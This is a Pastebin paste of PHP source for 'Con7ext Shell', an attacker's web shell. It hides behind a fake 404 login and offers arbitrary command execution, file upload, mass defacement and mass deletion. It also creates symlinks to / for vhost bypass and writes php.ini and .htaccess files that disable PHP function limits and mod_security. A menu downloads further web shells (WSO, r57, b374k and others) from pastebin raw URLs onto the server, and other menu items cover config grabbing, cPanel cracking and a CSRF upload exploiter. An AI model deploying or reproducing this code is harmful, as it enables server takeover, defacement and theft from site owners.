Guest User

jerux

a guest
Feb 17th, 2017
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 244.97 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. $auth_pass = "d17130ca158d5e7bc1cdeee11eeadb7c"; // con7extwebshell
  6. if(get_magic_quotes_gpc()) {    
  7. function VEstripslashes($array) {       return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }  
  8. $_POST = VEstripslashes($_POST);
  9. $_COOKIE = VEstripslashes($_COOKIE); }
  10.  
  11.  
  12. function Login() {
  13.     die("
  14. <html><head><title>404 Not Found</title></head>
  15. <style>
  16. input { margin:0;background-color:#fff;border:1px solid #fff; }
  17. </style>
  18. <body>
  19. <h1>Not Found</h1>
  20. <p>The requested URL  was not found on this server.</p><hr>
  21. <form method=post>
  22. <input type=password name=pass></form></body></html>");
  23. }
  24.  
  25. function VEsetcookie($k, $v) {
  26.     $_COOKIE[$k] = $v;
  27.     setcookie($k, $v);
  28. }
  29.  
  30. if(!empty($auth_pass)) {
  31.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  32.         VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  33.  
  34.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  35.         Login();
  36. }
  37. ?>
  38. <!DOCTYPE HTML>
  39. <HTML>
  40. <HEAD>
  41. <link href="" rel="stylesheet" type="text/css">
  42. <title>Con7ext Shell </title>
  43. <style>
  44. body{
  45. background-color: #333333;
  46. color:#B3454C;
  47. }
  48. li {
  49.     display: inline;
  50.     margin: 1px;
  51.     padding: 1px;
  52. }
  53.  
  54.  #menu a {
  55.                 padding:2px 10px;  
  56.                 margin:0;
  57.                 background:#333333;
  58.                 text-decoration:none;
  59.                 letter-spacing:2px;
  60.                 padding: 2px 10px;
  61.                 margin: 0;
  62.                 background: #333333;
  63.                 text-decoration: none;
  64.                 letter-spacing: 2px;
  65.                 border-radius: 2px;
  66.                 border-bottom: 2px solid #B3454C;
  67.                 border-top: 2px solid #B3454C;
  68.                 border-right: 2px solid red;
  69.                 border-left: 2px solid red;
  70.        }
  71.        #menu a:hover {
  72.             background:#180000;
  73.             border-bottom:0px solid #333333;
  74.             border-top:0px solid #333333;
  75.        }
  76. a{
  77. color:#B3454C;
  78. text-decoration: none;
  79. }
  80. textarea{
  81. backgroud-color:#333333;
  82. color: #B3454C;
  83. }
  84. input,select{
  85. border: 1px #B3454C solid;
  86. -moz-border-radius: 5px;
  87. -webkit-border-radius:5px;
  88. border-radius:5px;
  89. }
  90. </style>
  91. </HEAD>
  92.  
  93. <?php
  94. function w($dir,$perm) {
  95.     if(!is_writable($dir)) {
  96.         return "<font color=red>".$perm."</font>";
  97.     } else {
  98.         return "<font color=green>".$perm."</font>";
  99.     }
  100. }
  101. function exe($cmd) {
  102.     if(function_exists('system')) {        
  103.         @ob_start();       
  104.         @system($cmd);     
  105.         $buff = @ob_get_contents();        
  106.         @ob_end_clean();       
  107.         return $buff;  
  108.     } elseif(function_exists('exec')) {        
  109.         @exec($cmd,$results);      
  110.         $buff = "";        
  111.         foreach($results as $result) {         
  112.             $buff .= $result;      
  113.         } return $buff;    
  114.     } elseif(function_exists('passthru')) {        
  115.         @ob_start();       
  116.         @passthru($cmd);       
  117.         $buff = @ob_get_contents();        
  118.         @ob_end_clean();       
  119.         return $buff;  
  120.     } elseif(function_exists('shell_exec')) {      
  121.         $buff = @shell_exec($cmd);     
  122.         return $buff;  
  123.     }
  124. }
  125. function sulap($text) {
  126.   if(!get_magic_quotes_gpc()) {
  127.     return $text;
  128.     }
  129.   return stripslashes($text);
  130. }
  131. function ambilKata($param, $kata1, $kata2){
  132.     if(strpos($param, $kata1) === FALSE) return FALSE;
  133.     if(strpos($param, $kata2) === FALSE) return FALSE;
  134.     $start = strpos($param, $kata1) + strlen($kata1);
  135.     $end = strpos($param, $kata2, $start);
  136.     $return = substr($param, $start, $end - $start);
  137.     return $return;
  138. }
  139. function perms($file){
  140. $perms = fileperms($file);
  141. if (($perms & 0xC000) == 0xC000) {
  142. // Socket
  143. $info = 's';
  144. } elseif (($perms & 0xA000) == 0xA000) {
  145. // Symbolic Link
  146. $info = 'l';
  147. } elseif (($perms & 0x8000) == 0x8000) {
  148. // Regular
  149. $info = '-';
  150. } elseif (($perms & 0x6000) == 0x6000) {
  151. // Block special
  152. $info = 'b';
  153. } elseif (($perms & 0x4000) == 0x4000) {
  154. // Directory
  155. $info = 'd';
  156. } elseif (($perms & 0x2000) == 0x2000) {
  157. // Character special
  158. $info = 'c';
  159. } elseif (($perms & 0x1000) == 0x1000) {
  160. // FIFO pipe
  161. $info = 'p';
  162. } else {
  163. // Unknown
  164. $info = 'u';
  165. }
  166.  
  167. // Owner
  168. $info .= (($perms & 0x0100) ? 'r' : '-');
  169. $info .= (($perms & 0x0080) ? 'w' : '-');
  170. $info .= (($perms & 0x0040) ?
  171. (($perms & 0x0800) ? 's' : 'x' ) :
  172. (($perms & 0x0800) ? 'S' : '-'));
  173.  
  174. // Group
  175. $info .= (($perms & 0x0020) ? 'r' : '-');
  176. $info .= (($perms & 0x0010) ? 'w' : '-');
  177. $info .= (($perms & 0x0008) ?
  178. (($perms & 0x0400) ? 's' : 'x' ) :
  179. (($perms & 0x0400) ? 'S' : '-'));
  180.  
  181. // World
  182. $info .= (($perms & 0x0004) ? 'r' : '-');
  183. $info .= (($perms & 0x0002) ? 'w' : '-');
  184. $info .= (($perms & 0x0001) ?
  185. (($perms & 0x0200) ? 't' : 'x' ) :
  186. (($perms & 0x0200) ? 'T' : '-'));
  187.  
  188. return $info;
  189. }
  190. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  191. $sys = php_uname();
  192. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  193. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  194. $getds = @ini_get("disable_functions");
  195. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  196. if(isset($_GET['path'])){
  197. $path = $_GET['path'];
  198. }else{
  199. $path = getcwd();
  200. }
  201. $path = str_replace('\\','/',$path);
  202. $paths = explode('/',$path);
  203. $home_r = $_SERVER['DOCUMENT_ROOT'];
  204. $_COPY = base64_decode($_c7e);
  205. if(get_magic_quotes_gpc()){
  206. foreach($_POST as $key=>$value){
  207. $_POST[$key] = stripslashes($value);
  208. }
  209. }
  210. if($_POST['upload']) {
  211.         if($_POST['tipe_upload'] == 'biasa') {
  212.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  213.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  214.             } else {
  215.                 $act = "<font color=red>Failed to upload file</font>";
  216.             }
  217.         } else {
  218.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  219.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  220.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  221.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  222.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  223.                 } else {
  224.                     $act = "<font color=red>Failed to upload file</font>";
  225.                 }
  226.             } else {
  227.                 $act = "<font color=red>Failed to upload file</font>";
  228.             }
  229.         }
  230.     }
  231.     echo "<center>Uploader :
  232.     <form method='post' enctype='multipart/form-data'>
  233.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  234.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  235.     <input type='file' name='ix_file'>
  236.     <input type='submit' value='upload' name='upload'>
  237.     </form>";
  238.     echo $act;
  239. echo '<center>
  240. <table width="700" align="center">
  241. <center>
  242. <form method="get">
  243. <select name="shell">
  244. <option value="">Shell Creator</option>
  245. <option value="wso">WSO Shell</option>
  246. <option value="idx">IDX Shell</option>
  247. <option value="b374k">B374K Shell</option>
  248. <option value="r57">R57 Shell</option>
  249. <option value="b374k">b374k Shell</option>
  250. <option value="blackhat">BlackHat Shell</option>
  251. <option value="noname">Noname Shell</option>
  252. </select>
  253. <input type="submit" value=">">
  254. </form>
  255. </center>
  256. ';
  257. echo'
  258. <div id="menu">
  259. <center>
  260. <ul>
  261. <li><a href="?">Home</a></li>
  262. <li><a href="?path='.$path.'&con7ext=info">System Info</a></li>
  263. <li><a href="?path='.$path.'&con7ext=config">Config Grab</a></li>
  264. <li><a href="?path='.$path.'&con7ext=crkcp">Cp Crack</a></li>
  265. <li><a href="?path='.$path.'&con7ext=jumping">Jumping</a></li>
  266. <li><a href="?path='.$path.'&con7ext=symlink">Symlink</a></li>
  267. <li><a href="?path='.$path.'&con7ext=adminer">Adminer</a></li><br><br>
  268. <li><a href="?path='.$path.'&con7ext=network">BackConnect</a>
  269. <li><a href="?path='.$path.'&con7ext=mail">Mailer</a></li>
  270. <li><a href="?path='.$path.'&con7ext=edituser">Auto Edit User</a></li>
  271. <li><a href="?path='.$path.'&con7ext=zoneh">Zone-H</a></li>
  272. <li><a href="?path='.$path.'&con7ext=defid">Defacer.id</a></li>
  273. <li><a href="?path='.$path.'&con7ext=symconfig">SymConfig</a></li><br><br>
  274. <li><a href="?path='.$path.'&con7ext=disablefunc">Disable Functions</a></li>
  275. <li><a href="?path='.$path.'&con7ext=domains">Domain Views</a></li>
  276. <li><a href="?path='.$path.'&con7ext=hashid">Hash ID</a></li>
  277. <li><a href="?path='.$path.'&con7ext=bing">Bing Grab</a></li>
  278. <li><a href="?path='.$path.'&con7ext=mass_deface">Mass Tools</a></li><br><br>
  279. <li><a href="?path='.$path.'&con7ext=cmd">Command</a></li>
  280. <li><a href="?path='.$path.'&con7ext=csrfup">Csrf Exploiter</a></li>
  281. <li><a href="?path='.$path.'&con7ext=vhost">Bypass Vhost</a></li>
  282. <li><a href="?path='.$path.'&con7ext=kill">Kill Your Self</a></li>
  283. </ul></center></div>';
  284. echo '
  285. <br>
  286. <table width="700" align="center">
  287. <tr><td><font color="white">Current Path :</font>';
  288. foreach($paths as $id=>$pat){
  289. if($pat == '' && $id == 0){
  290. $a = true;
  291. echo '<a href="?path=/">/</a>';
  292. continue;
  293. }
  294. if($pat == '') continue;
  295. echo '<a href="?path=';
  296. for($i=0;$i<=$id;$i++){
  297. echo "$paths[$i]";
  298. if($i != $id) echo "/";
  299. }
  300. echo '">'.$pat.'</a>/';
  301. }
  302. echo '</td></tr>';
  303. echo '</table>';
  304. if($_GET['con7ext'] == 'logout') {
  305. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  306.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  307.     echo 'Good Bye!!';
  308. } elseif($_GET['con7ext'] == 'cmd') {
  309. echo "<br><fieldset>";
  310.     echo "<form method='post'>
  311. <font style='text-decoration: underline;'>Command : </font>
  312. <input type='text' size='30' height='10' name='command'><input type='submit' name='c7ecmd' value='>>'>
  313.     </form> ";
  314.     if(isset($_POST['c7ecmd']))
  315. {
  316.  
  317. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  318. $cmd = $_POST['command'];
  319. if($cmd == "")
  320. {
  321.  
  322. echo "Please Insert Command!";
  323.  }
  324.  
  325. elseif(isset($cmd))
  326.  {
  327.  $output = exe($cmd);
  328.  echo $output; }
  329. echo'</pre></div><br><br>';
  330. }
  331. echo "</fieldset><br>";
  332. }elseif($_GET['con7ext'] == 'mass_deface') {
  333.     echo "<center><form action=\"\" method=\"post\">\n";
  334.     $dirr=$_POST['d_dir'];
  335.     $index = $_POST["script"];
  336.     $index = str_replace('"',"'",$index);
  337.     $index = stripslashes($index);
  338.     function edit_file($file,$index){
  339.         if (is_writable($file)) {
  340.         clear_fill($file,$index);
  341.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  342.         }
  343.         else {
  344.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  345.             }
  346.             }
  347.     function hapus_massal($dir,$namafile) {
  348.         if(is_writable($dir)) {
  349.             $dira = scandir($dir);
  350.             foreach($dira as $dirb) {
  351.                 $dirc = "$dir/$dirb";
  352.                 $lokasi = $dirc.'/'.$namafile;
  353.                 if($dirb === '.') {
  354.                     if(file_exists("$dir/$namafile")) {
  355.                         unlink("$dir/$namafile");
  356.                     }
  357.                 } elseif($dirb === '..') {
  358.                     if(file_exists("".dirname($dir)."/$namafile")) {
  359.                         unlink("".dirname($dir)."/$namafile");
  360.                     }
  361.                 } else {
  362.                     if(is_dir($dirc)) {
  363.                         if(is_writable($dirc)) {
  364.                             if(file_exists($lokasi)) {
  365.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  366.                                 unlink($lokasi);
  367.                                 $idx = hapus_massal($dirc,$namafile);
  368.                             }
  369.                         }
  370.                     }
  371.                 }
  372.             }
  373.         }
  374.     }
  375.     function clear_fill($file,$index){
  376.         if(file_exists($file)){
  377.             $handle = fopen($file,'w');
  378.             fwrite($handle,'');
  379.             fwrite($handle,$index);
  380.             fclose($handle);  } }
  381.  
  382.     function gass(){
  383.         global $dirr , $index ;
  384.         chdir($dirr);
  385.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  386.         $files = scandir($dirr) ;
  387.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  388.         sort($files);
  389.         $n = 0 ;
  390.         foreach ($files as $file){
  391.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  392.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  393.                 edit_file($file,$index);
  394.                 flush();
  395.                 $n = $n +1 ;
  396.                 }
  397.                 }
  398.                 echo "<br>";
  399.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  400.                     }
  401.     function ListFiles($dirrall) {
  402.  
  403.     if($dh = opendir($dirrall)) {
  404.  
  405.        $files = Array();
  406.        $inner_files = Array();
  407.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  408.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  409.         while($file = readdir($dh)) {
  410.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  411.                 if(is_dir($dirrall . "/" . $file)) {
  412.                     $inner_files = ListFiles($dirrall . "/" . $file);
  413.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  414.                 } else {
  415.                     array_push($files, $dirrall . "/" . $file);
  416.                 }
  417.             }
  418.             }
  419.  
  420.             closedir($dh);
  421.             return $files;
  422.         }
  423.     }
  424.     function gass_all(){
  425.         global $index ;
  426.         $dirrall=$_POST['d_dir'];
  427.         foreach (ListFiles($dirrall) as $key=>$file){
  428.             $file = str_replace('//',"/",$file);
  429.             echo "<center><strong>$file</strong> ===>";
  430.             edit_file($file,$index);
  431.             flush();
  432.         }
  433.         $key = $key+1;
  434.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  435.     function sabun_massal($dir,$namafile,$isi_script) {
  436.         if(is_writable($dir)) {
  437.             $dira = scandir($dir);
  438.             foreach($dira as $dirb) {
  439.                 $dirc = "$dir/$dirb";
  440.                 $lokasi = $dirc.'/'.$namafile;
  441.                 if($dirb === '.') {
  442.                     file_put_contents($lokasi, $isi_script);
  443.                 } elseif($dirb === '..') {
  444.                     file_put_contents($lokasi, $isi_script);
  445.                 } else {
  446.                     if(is_dir($dirc)) {
  447.                         if(is_writable($dirc)) {
  448.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  449.                             file_put_contents($lokasi, $isi_script);
  450.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  451.                         }
  452.                     }
  453.                 }
  454.             }
  455.         }
  456.     }
  457.     if($_POST['mass'] == 'onedir') {
  458.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  459.         $ini="http://";
  460.         $mainpath=$_POST[d_dir];
  461.         $file=$_POST[d_file];
  462.         $dir=opendir("$mainpath");
  463.         $code=base64_encode($_POST[script]);
  464.         $indx=base64_decode($code);
  465.         while($row=readdir($dir)){
  466.         $start=@fopen("$row/$file","w+");
  467.         $finish=@fwrite($start,$indx);
  468.         if ($finish){
  469.             echo"$ini$row/$file\n";
  470.             }
  471.         }
  472.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  473.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  474.         $dir=opendir("$mainpath");
  475.         $code=base64_encode($_POST[script]);
  476.         $indx=base64_decode($code);
  477.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  478.         $finish=@fwrite($start,$indx);
  479.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  480.         }
  481.  
  482.     }
  483.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  484.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  485.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  486.     elseif($_POST['mass'] == 'massdeface') {
  487.         echo "<div style='margin: 5px auto; padding: 5px'>";
  488.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  489.         echo "</div>";  }
  490.     else {
  491.         echo "
  492.         <center><font style='text-decoration: underline;'>
  493.         Select Type:<br>
  494.         </font>
  495.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  496.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  497.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  498.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  499.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  500.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  501.         <font style='text-decoration: underline;'>Folder:</font><br>
  502.         <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  503.         <font style='text-decoration: underline;'>Filename:</font><br>
  504.         <input type='text' name='d_file' value='noname.php' style='width: 450px;' height='10'><br>
  505.         <font style='text-decoration: underline;'>Index File:</font><br>
  506.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Rinto AR</textarea><br>
  507.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  508.         </form></center>";
  509.         }
  510. } elseif($_GET['con7ext'] == 'vhost') {
  511.     echo "<form method='POST' action=''>";
  512.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  513.     echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  514.         if (isset($_POST['Colii'])){ system('ln -s / Rintoar.txt');
  515.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  516.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  517.             $rt="<br><a href=Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  518.     Bypassed Successfully</b></font></a>";
  519.     echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
  520. } elseif($_GET['con7ext'] == 'csrfup')
  521. {  
  522. echo '<html>
  523. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit<br>Recoded by Rinto AR</h1><br><br>
  524. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  525. <br><br>
  526. <form method="post" style="font-size:25px;">
  527. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  528. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  529. <input type="submit" name="d" value="Lock!">
  530. </form>';
  531. $url = $_POST["url"];
  532. $pf = $_POST["pf"];
  533. $d = $_POST["d"];
  534. if($d) {
  535.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  536. </html>";
  537. }
  538. } elseif($_GET['con7ext'] == 'hashid') {
  539. if (isset($_POST['gethash'])) {
  540.         $hash = $_POST['hash'];
  541.         if (strlen($hash) == 32) {
  542.             $hashresult = "MD5 Hash";
  543.         } elseif (strlen($hash) == 40) {
  544.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  545.         } elseif (strlen($hash) == 13) {
  546.             $hashresult = "DES(Unix) Hash";
  547.         } elseif (strlen($hash) == 16) {
  548.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  549.         } elseif (strlen($hash) == 41) {
  550.             $GetHashChar = substr($hash, 40);
  551.             if ($GetHashChar == "*") {
  552.                 $hashresult = "MySQL5 Hash";
  553.             }
  554.         } elseif (strlen($hash) == 64) {
  555.             $hashresult = "SHA-256 Hash";
  556.         } elseif (strlen($hash) == 96) {
  557.             $hashresult = "SHA-384 Hash";
  558.         } elseif (strlen($hash) == 128) {
  559.             $hashresult = "SHA-512 Hash";
  560.         } elseif (strlen($hash) == 34) {
  561.             if (strstr($hash, '$1$')) {
  562.                 $hashresult = "MD5(Unix) Hash";
  563.             }
  564.         } elseif (strlen($hash) == 37) {
  565.             if (strstr($hash, '$apr1$')) {
  566.                 $hashresult = "MD5(APR) Hash";
  567.             }
  568.         } elseif (strlen($hash) == 34) {
  569.             if (strstr($hash, '$H$')) {
  570.                 $hashresult = "MD5(phpBB3) Hash";
  571.             }
  572.         } elseif (strlen($hash) == 34) {
  573.             if (strstr($hash, '$P$')) {
  574.                 $hashresult = "MD5(Wordpress) Hash";
  575.             }
  576.         } elseif (strlen($hash) == 39) {
  577.             if (strstr($hash, '$5$')) {
  578.                 $hashresult = "SHA-256(Unix) Hash";
  579.             }
  580.         } elseif (strlen($hash) == 39) {
  581.             if (strstr($hash, '$6$')) {
  582.                 $hashresult = "SHA-512(Unix) Hash";
  583.             }
  584.         } elseif (strlen($hash) == 24) {
  585.             if (strstr($hash, '==')) {
  586.                 $hashresult = "MD5(Base-64) Hash";
  587.             }
  588.         } else {
  589.             $hashresult = "Hash type not found";
  590.         }
  591.     } else {
  592.         $hashresult = "Not Hash Entered";
  593.     }
  594. ?>
  595.     <center><br><Br><br>
  596.    
  597.         <form action="" method="POST">
  598.         <tr>
  599.         <table >
  600.         <th colspan="5">Hash Identification</th>
  601.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  602.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  603.     </table></tr></form>
  604.     </center>
  605. <?php
  606. } elseif($_GET['con7ext'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  607. } elseif($_GET['con7ext'] == 'disablefunc'){
  608.         echo "<center>";
  609.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  610.         if(isset($_POST['ini']))
  611. {
  612.         $file = fopen("php.ini","w");
  613.         echo fwrite($file,"disable_functions=none
  614. safe_mode = Off
  615.     ");
  616.         fclose($file);
  617.         echo "<a href='php.ini'>click here!</a>";
  618. }       if(isset($_POST['htce']))
  619. {
  620.         $file = fopen(".htaccess","w");
  621.         echo fwrite($file,"<IfModule mod_security.c>
  622. SecFilterEngine Off
  623. SecFilterScanPOST Off
  624. </IfModule>
  625.     ");
  626.         fclose($file);
  627.         echo "htaccess successfully created!";
  628. }
  629.         echo"</center>";
  630. }elseif($_GET['shell'] == 'wso'){
  631.     $tools_dir = mkdir('c7e_tools', 0755);
  632.     $file_tools = "c7e_tools/wso.php";
  633.     $isi_httools = "<IfModule mod_security.c>
  634. SecFilterEngine Off
  635. SecFilterScanPOST Off
  636. </IfModule>";
  637.     $httools = fopen(".htaccess", "w");
  638.     $tools_script = file_get_contents("http://pastebin.com/raw.php?i=N0eh3Q7Y");
  639.     $tools = fopen($file_tools, "w");
  640.     fwrite($tools, $tools_script);
  641.     fwrite($httools, $isi_httools);
  642.     chmod($file_tools, 0755);
  643.     echo "Done <a href='c7e_tools/wso.php'>WSO Shell Here</a>";
  644. }
  645. elseif($_GET['shell'] == 'idx'){
  646.     $tools2_dir = mkdir('c7e_tools', 0755);
  647.     $file_tools2 = "c7e_tools/idx.php";
  648.     $isi_httools2 = "<IfModule mod_security.c>
  649. SecFilterEngine Off
  650. SecFilterScanPOST Off
  651. </IfModule>";
  652.     $httools2 = fopen(".htaccess", "w");
  653.     $tools2_script = file_get_contents("http://pastebin.com/raw.php?i=nC6pWh5a");
  654.     $tools2 = fopen($file_tools2, "w");
  655.     fwrite($tools2, $tools2_script);
  656.     fwrite($httools2, $isi_httools2);
  657.     chmod($file_tools2, 0755);
  658.     echo "Done <a href='c7e_tools/idx.php'>Idx Shell Here</a>";
  659. }
  660. elseif($_GET['shell'] == 'b374k'){
  661.     $tools3_dir = mkdir('c7e_tools', 0755);
  662.     $file_tools3 = "c7e_tools/b374k.php";
  663.     $isi_httools3 = "<IfModule mod_security.c>
  664. SecFilterEngine Off
  665. SecFilterScanPOST Off
  666. </IfModule>";
  667.     $httools3 = fopen(".htaccess", "w");
  668.     $tools3_script = file_get_contents("http://pastebin.com/raw.php?i=cR71LiMp");
  669.     $tools3 = fopen($file_tools3, "w");
  670.     fwrite($tools3, $tools3_script);
  671.     fwrite($httools3, $isi_httools3);
  672.     chmod($file_tools3, 0755);
  673.     echo "Done <a href='c7e_tools/b374k.php'>b374k Shell Here</a>";
  674. }
  675. elseif($_GET['shell'] == 'sadrazam'){
  676.     $tools4_dir = mkdir('c7e_tools', 0755);
  677.     $file_tools4 = "c7e_tools/sadrazam.php";
  678.     $isi_httools4 = "<IfModule mod_security.c>
  679. SecFilterEngine Off
  680. SecFilterScanPOST Off
  681. </IfModule>";
  682.     $httools4 = fopen(".htaccess", "w");
  683.     $tools4_script = file_get_contents("http://pastebin.com/raw.php?i=xjKrnnBD");
  684.     $tools4 = fopen($file_tools4, "w");
  685.     fwrite($tools4, $tools4_script);
  686.     fwrite($httools4, $isi_httools4);
  687.     chmod($file_tools4, 0755);
  688.     echo "Done <a href='c7e_tools/sadrazam.php'>Sadrazam Shell Here</a>";
  689. }
  690. elseif($_GET['shell'] == 'blackhat'){
  691.     $tools5_dir = mkdir('c7e_tools', 0755);
  692.     $file_tools5 = "c7e_tools/bh.php";
  693.     $isi_httools5 = "<IfModule mod_security.c>
  694. SecFilterEngine Off
  695. SecFilterScanPOST Off
  696. </IfModule>";
  697.     $httools5 = fopen(".htaccess", "w");
  698.     $tools5_script = file_get_contents("http://pastebin.com/raw.php?i=3L2ESWeu");
  699.     $tools5 = fopen($file_tools5, "w");
  700.     fwrite($tools5, $tools5_script);
  701.     fwrite($httools5, $isi_httools5);
  702.     chmod($file_tools5, 0755);
  703.     echo "Done <a href='c7e_tools/bh.php'>Black Hat Shell Here</a>";
  704. }
  705. elseif($_GET['shell'] == 'r57'){
  706.     $tools6_dir = mkdir('c7e_tools', 0755);
  707.     $file_tools6 = "c7e_tools/r57.php";
  708.     $isi_httools6 = "<IfModule mod_security.c>
  709. SecFilterEngine Off
  710. SecFilterScanPOST Off
  711. </IfModule>";
  712.     $httools6 = fopen(".htaccess", "w");
  713.     $tools6_script = file_get_contents("http://pastebin.com/raw.php?i=G2VEDunW");
  714.     $tools6 = fopen($file_tools6, "w");
  715.     fwrite($tools6, $tools6_script);
  716.     fwrite($httools6, $isi_httools6);
  717.     chmod($file_tools6, 0755);
  718.     echo "Done <a href='c7e_tools/r57.php'>R57 Shell Here</a>";
  719. }
  720. elseif($_GET['shell'] == 'noname'){
  721.     $tools7_dir = mkdir('c7e_tools', 0755);
  722.     $file_tools7 = "c7e_tools/noname.php";
